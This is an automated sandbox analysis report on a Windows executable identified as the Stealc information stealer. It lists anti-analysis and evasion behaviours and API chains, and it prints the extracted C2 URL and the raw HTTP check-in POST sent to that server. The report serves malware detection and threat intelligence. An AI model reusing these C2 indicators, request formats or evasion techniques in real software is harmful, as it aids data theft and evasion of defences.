Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1543701
MD5:f522fe27067daea4f7987bf85ec1e287
SHA1:d3179eac21c33134b326721db3eec7b7d1f1ac5f
SHA256:3c60d4aebf5332d3a7fc6ea700f8ab74addba285246ba9cf94968a41cc11480a
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F522FE27067DAEA4F7987BF85EC1E287)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1765760995.000000000165E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1721174254.0000000005370000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6828JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6828JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.d30000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-28T09:24:20.252534+010020442431Malware Command and Control Activity Detected192.168.2.449729185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.d30000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00D49030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00D3A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D372A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00D372A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00D3A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00D3C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1721174254.000000000539B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1721174254.000000000539B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00D440F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00D3E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00D447C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D31710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D44B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00D43B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00D3EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3DF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49729 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 33 31 41 31 33 43 41 43 34 33 33 34 33 30 33 37 33 35 33 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="hwid"C131A13CAC433430373531------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="build"tale------HDBGHDHCGHCAAKEBKECB--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D362D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00D362D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 33 31 41 31 33 43 41 43 34 33 33 34 33 30 33 37 33 35 33 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="hwid"C131A13CAC433430373531------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="build"tale------HDBGHDHCGHCAAKEBKECB--
                Source: file.exe, 00000000.00000002.1765760995.000000000165E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1765760995.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/(
                Source: file.exe, 00000000.00000002.1765760995.00000000016A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php5e
                Source: file.exe, 00000000.00000002.1765760995.00000000016A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpS
                Source: file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/:
                Source: file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/i
                Source: file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, file.exe, 00000000.00000003.1721174254.000000000539B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D700980_2_00D70098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8B1980_2_00D8B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D0500_2_0118D050
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011980DC0_2_011980DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621380_2_00D62138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D742880_2_00D74288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9E2580_2_00D9E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAD39E0_2_00DAD39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011832540_2_01183254
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011882840_2_01188284
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBB3080_2_00DBB308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0119051F0_2_0119051F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9D5A80_2_00D9D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D745A80_2_00D745A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5E5440_2_00D5E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D545730_2_00D54573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0113D7030_2_0113D703
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D766C80_2_00D766C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011867390_2_01186739
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB96FD0_2_00DB96FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAA6480_2_00DAA648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F77F70_2_010F77F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118B60E0_2_0118B60E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010386390_2_01038639
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA67990_2_00DA6799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8D7200_2_00D8D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010599050_2_01059905
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9F8D60_2_00D9F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D898B80_2_00D898B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8B8A80_2_00D8B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D848680_2_00D84868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA0B880_2_00DA0B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA4BA80_2_00DA4BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01198AE70_2_01198AE7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0122AD220_2_0122AD22
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAAC280_2_00DAAC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D84DC80_2_00D84DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D85DB90_2_00D85DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01189CBA0_2_01189CBA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D61D780_2_00D61D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8BD680_2_00D8BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9AD380_2_00D9AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA1EE80_2_00DA1EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D78E780_2_00D78E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01216EB50_2_01216EB5
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00D34610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: pngrdmjc ZLIB complexity 0.9948482190148306
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00D49790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D43970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00D43970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\5J6FG5MR.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2129920 > 1048576
                Source: file.exeStatic PE information: Raw size of pngrdmjc is bigger than: 0x100000 < 0x19d000
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1721174254.000000000539B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1721174254.000000000539B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.d30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pngrdmjc:EW;vsguhmza:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pngrdmjc:EW;vsguhmza:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D49BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x21493d should be: 0x20bf42
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: pngrdmjc
                Source: file.exeStatic PE information: section name: vsguhmza
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0122B122 push 61C01C88h; mov dword ptr [esp], esp0_2_0122B259
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5A0DC push eax; retf 0_2_00D5A0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5A0F2 push eax; retf 0_2_00D5A119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0120416D push 421BFCC3h; mov dword ptr [esp], edi0_2_01204190
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012381AB push 1C151EE5h; mov dword ptr [esp], ebp0_2_012381D1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012381AB push edi; mov dword ptr [esp], edx0_2_01238235
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0125D03C push 761406FBh; mov dword ptr [esp], esi0_2_0125D081
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0125D03C push 2C37DD47h; mov dword ptr [esp], edx0_2_0125D115
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B9023 push edx; mov dword ptr [esp], ebp0_2_011B907D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push ecx; mov dword ptr [esp], eax0_2_0118D06E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push edx; mov dword ptr [esp], 69FD8B6Fh0_2_0118D0F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push eax; mov dword ptr [esp], ebp0_2_0118D108
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push 63BCAFB8h; mov dword ptr [esp], ebp0_2_0118D181
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push esi; mov dword ptr [esp], 7FD78C74h0_2_0118D192
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push 62553831h; mov dword ptr [esp], esi0_2_0118D23A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push eax; mov dword ptr [esp], ebp0_2_0118D270
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push 61E43BE7h; mov dword ptr [esp], esi0_2_0118D33D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push 2842D236h; mov dword ptr [esp], ebx0_2_0118D3A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push ebx; mov dword ptr [esp], 45340E4Ch0_2_0118D48E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push ecx; mov dword ptr [esp], ebp0_2_0118D4A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push ebp; mov dword ptr [esp], esi0_2_0118D4BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push edi; mov dword ptr [esp], 7BBF7215h0_2_0118D4C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push ecx; mov dword ptr [esp], 54CBEFC5h0_2_0118D571
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push 149B18F0h; mov dword ptr [esp], ebp0_2_0118D5FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push ebp; mov dword ptr [esp], edx0_2_0118D64A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push 55FFB401h; mov dword ptr [esp], ecx0_2_0118D6F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push edi; mov dword ptr [esp], eax0_2_0118D796
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push 2A34903Eh; mov dword ptr [esp], edx0_2_0118D855
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push ebx; mov dword ptr [esp], edx0_2_0118D859
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push 0970A36Bh; mov dword ptr [esp], ecx0_2_0118D903
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118D050 push edi; mov dword ptr [esp], edx0_2_0118D92E
                Source: file.exeStatic PE information: section name: pngrdmjc entropy: 7.954059583965191

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
